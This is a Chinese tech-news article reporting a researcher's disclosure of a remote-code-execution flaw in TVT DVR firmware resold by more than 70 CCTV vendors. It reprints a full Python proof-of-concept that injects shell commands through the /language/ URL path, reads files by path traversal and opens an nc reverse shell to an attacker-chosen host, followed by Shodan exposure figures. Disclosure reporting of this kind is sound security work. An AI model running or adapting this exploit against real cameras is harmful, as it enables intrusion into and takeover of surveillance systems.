黑掉70多款监控摄像头?so easy!
创始人
2025-01-28 09:41:23
0次
近日,一位安全研究员发现70多个供应商售卖的监控摄像头很容易受到远程代码执行(RCE)攻击。
根据安全研究员Rotem Kemer研究发现,超过70个供应商售卖的监控摄像头都很容哟受到远程代码执行(RCE)攻击。
[[164830]]
研究人员注意到供应商正在售卖的商品使用的是同样的、易受到RCE攻击的固件。
在“白色标签”的经营模式下,各种各样的供应商只是简单地将自己的标签贴在相同的产品上进行售卖,但是不幸的是,他们都没有开发软件硬件的资格。
这个脆弱的固件是由一家中国制造商TVT开发的,Kerner分析之后发现了闭路电视系统的DVR盒易于攻击的原因。
使用这种固件的产品是在一家销售闭路电视系统的以色列公司购买的,其代码也表明了这是一个脆弱的HTTP服务器。
安全漏洞依赖于服务器来检查是否存在给定语言的目录。如果该文件夹不存在,软件会通过提取远程命令来执行打开口令。
下面是研究人员的解释:
它会读取URL,如果URL包含以下的内容/language/[language]/index.html 。
如果该目录存在的话,就会提取斜杠之间的【language】内容并且进行检查;如果不存在,就会直接执行此命令
tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language
这基本上就是给了我们一个远程命令执行的机会。
下面是影响固件漏洞的概念证明代码:
- #!/usr/bin/python
- # http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
- __author__ = 'Rotem Kerner'
- from sys import argv
- import optparse
- from urlparse import urlparse
- from re import compile
- import socket
- import requests
- from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
- from socket import timeout
- def main():
- # parse command line options and atguments
- optparseoptparser = optparse.OptionParser(usage="%s
[options]" % argv[0]) - optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
- help="Check if target is vulnerable")
- optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
- help="Fire the exploit against the given target URL")
- (options, args) = optparser.parse_args()
- try:
- target = args[0]
- except IndexError:
- optparser.print_help()
- exit()
- target_url = urlparse(target)
- # validating hostname
- if not target_url.hostname:
- print "[X] supplied target "%s" is not a valid URL" % target
- optparser.print_help()
- exit()
- # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
- socket.setdefaulttimeout(10)
- # is -c flag on check if target url is vulnrable.
- if options.checkvuln is True:
- print "[!] Checking if target "%s" is vulnable..." % target_url.netloc
- try:
- # Write file
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
- % (target_url.scheme, target_url.netloc))
- # Read the file.
- response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
- # remove it..
- raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
- % (target_url.scheme, target_url.netloc))
- except (ConnectionError, Timeout, timeout) as e:
- print "[X] Unable to connect. reason: %s. exiting..." % e.message
- return
- if response.text[0] != '1':
- print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
- return
- print "[V] Target "%s" is vulnerable!" % target_url.netloc
- # if -e is on then fire exploit,
- if options.connback is not None:
- # Validate connect-back information.
- pattern = compile('(?P
[a-zA-Z0-9.-]+):(?P [0-9]+)') - match = pattern.search(options.connback)
- if not match:
- print "[X] given connect back "%s" should be in the format for host:port" % options.connback
- optparser.print_help()
- exit()
- # fire remote code execution!
- # Three ..
- try:
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
- % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
- # Two ...
- raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
- % (target_url.scheme, target_url.netloc))
- # One. Left off!
- raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
- % (target_url.scheme, target_url.netloc))
- except (ConnectionError, Timeout, timeout) as e:
- print "[X] Unable to connect reason: %s. exiting..." % e.message
- print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"
- % (match.group('host'), match.group('port'))
- # Disabling URL encode hack
- def raw_url_request(url):
- r = requests.Request('GET')
- r.url = url
- rr = r.prepare()
- # set url without encoding
- r.url = url
- s = requests.Session()
- return s.send(r)
- if __name__ == '__main__':
- main()
他注意到目前来说有数以万计的产品在使用这种HTTP服务器。他是在查询了Shodan搜索引擎之后做出的这样的肯定判断,而没在这种搜索引擎中的产品可能数量更多。
研究者说,“快速查询Shodan之后发现其分布超过三万;这已经很多了,但是我相信这还只是一小部分。”
Kerner试图向最初的制造商TVT报告这个问题,但是没有受到任何回复。
相关内容
热门资讯
PHP新手之PHP入门
PHP是一种易于学习和使用的服务器端脚本语言。只需要很少的编程知识你就能使用PHP建立一个真正交互的...
网络中立的未来 网络中立性是什...
《牛津词典》中对“网络中立”的解释是“电信运营商应秉持的一种原则,即不考虑来源地提供所有内容和应用的...
各种千兆交换机的数据接口类型详...
千兆交换机有很多值得学习的地方,这里我们主要介绍各种千兆交换机的数据接口类型,作为局域网的主要连接设...
粉嫩如何诠释霸道 东芝M805...
“霸道粉”是个什么玩意东芝M805拿过来的时候,笔者扑哧笑了,不是笑这款笔记本,而是笑这款产品的颜色...
什么是大数据安全 什么是大数据...
在《为什么需要大数据安全分析》一文中,我们已经阐述了一个重要观点,即:安全要素信息呈现出大数据的特征...
如何利用交换机和端口设置来管理...
在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
全面诠释网络负载均衡
负载均衡的出现大大缓解了服务器的压力,更是有效的利用了资源,提高了效率。那么我们现在来说一下网络负载...
如何允许远程连接到MySQL数...
[[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
30分钟搞定iOS自定义相机
最近公司的项目中用到了相机,由于不用系统的相机,UI给的相机切图,必须自定义才可以。就花时间简单研究...
Intel将Moblin社区控...
本周二,非营利机构Linux基金会宣布,他们将担负起Moblin社区的管理工作,而这之前,Mobli...